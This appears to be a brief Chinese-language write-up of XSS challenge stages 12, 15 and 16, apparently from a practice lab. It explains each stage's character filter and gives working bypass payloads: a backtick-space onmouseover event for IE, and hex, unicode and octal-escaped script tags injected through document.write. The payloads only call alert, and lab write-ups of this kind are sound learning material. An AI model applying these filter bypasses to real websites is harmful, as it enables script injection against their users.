stage 12
输入过滤了以下字符s/[\x00-\x20\<\>\"\']//g;
使用字符``可以在ie下制造空格实现绕过
``οnmοuseοver=alert(document.domain);
stage 15
document.write写内容时对\x3c和\x3e会解析为<>;但是输入\会被替换,而后发现存在输入\\则只替换一个\
\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
stage16很类似,但是对\\x做了替换,可以使用unicode字符\u003cscript\u003ealert(document.domain);\u003c/script\u003e
或十进制也可以。\74script\76这样
总之document.write可以试试各种编码来注入字符,如果对\字符全部过滤就不太好办了